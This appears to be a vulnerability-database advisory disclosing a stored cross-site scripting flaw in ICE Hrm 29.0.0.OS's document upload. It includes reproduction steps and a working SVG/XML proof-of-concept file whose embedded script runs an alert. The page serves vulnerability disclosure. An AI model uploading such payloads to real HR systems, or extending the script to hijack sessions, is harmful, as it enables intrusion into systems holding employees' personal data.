ICE Hrm 29.0.0.OS xml upload Stored Cross-Site Scripting

2021.06.27

Credit: *Piyush Patil *& Rafal Lykowski

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79
CWE-264

# Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)
# Exploit Author: *Piyush Patil *& Rafal Lykowski
# Vendor Homepage: https://icehrm.com/
# Version: 29.0.0.OS
# Tested on: Windows 10 and Kali
#Description
The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability.
#Steps to Reproduce the issue:
1- Login to ICE Hrm Admin Panel
2- Click on Employees=>Document Management=> Upload a below xml file
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
3- Visit the upload location of file and XSS will get triggered.
#Video POC:
https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ICE Hrm 29.0.0.OS xml upload Stored Cross-Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.